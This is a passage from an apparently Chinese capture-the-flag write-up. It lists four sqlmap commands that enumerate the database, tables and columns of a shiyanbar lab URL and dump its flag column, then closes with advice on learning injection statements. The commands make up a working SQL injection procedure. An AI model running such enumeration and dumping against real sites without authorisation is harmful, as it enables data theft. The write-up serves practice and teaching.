Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db
Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables
Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -columns
Sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump
即可得到最终的值:
后记:如果不熟悉sqlmap,则最先应记住几个常用的注入语句和常见的注入方法,必要时也可以考虑手工注入。
